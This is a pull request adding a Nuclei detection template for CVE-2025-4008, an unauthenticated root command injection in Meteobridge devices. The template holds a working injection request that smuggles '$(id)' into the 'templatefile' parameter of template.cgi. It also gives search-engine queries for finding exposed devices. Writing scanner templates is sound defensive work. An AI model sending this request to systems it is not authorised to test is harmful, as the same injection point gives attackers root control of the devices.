### PR TITLE
feature: Add nuclei template for CVE-2025-4008.

### DIFF
--- a/nuclei/CVECVE-2025-4008.yaml
+++ b/nuclei/CVECVE-2025-4008.yaml
@@ -1,0 +1,44 @@
+id: CVE-2025-4008
+
+info:
+  name: MeteoBridge <= 6.1 - Remote Code Execution
+  author: iamnoooob,pdresearch
+  severity: high
+  description: |
+    The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
+  reference:
+    - https://forum.meteohub.de/viewtopic.php?t=18687
+    - https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-4008
+  classification:
+    cve-id: CVE-2025-4008
+    cvss-score: 7.5
+    cwe-id: CWE-77
+    epss-score: 0.41761
+    epss-percentile: 0.97323
+  metadata:
+    verified: true
+    shodan-query: "meteobridge"
+    fofa-query: "Meteobridge"
+  tags: cve,cve2025,meteobridge,rce,kev,vkev
+
+http:
+  - raw:
+      - |
+        GET /public/template.cgi?templatefile=$(id) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Error: template file'
+          - 'uid='
+          - 'gid='
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a004830460221009299f4f123020ee6d56808ca3994ff0cdfb910c8daef36607f7744525c1c9a5602210094056ec4fb71c8457798d9a90766b755cdd5331acea8408afe1ded1c79485c67:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
This PR introduces a Nuclei template to detect  CVE-2025-4008, a `HIGH`  Command Injection in  Meteobridge VM & Firmware  versions up to & excluding 6.2.

**Tested against ~1309 diverse non-vulnerable web servers** with zero false positives observed.
**Tested against known vulnerable instance** 

![poc](https://github.com/user-attachments/assets/6cd6cc8d-0d73-491e-a684-db737082fe1b)
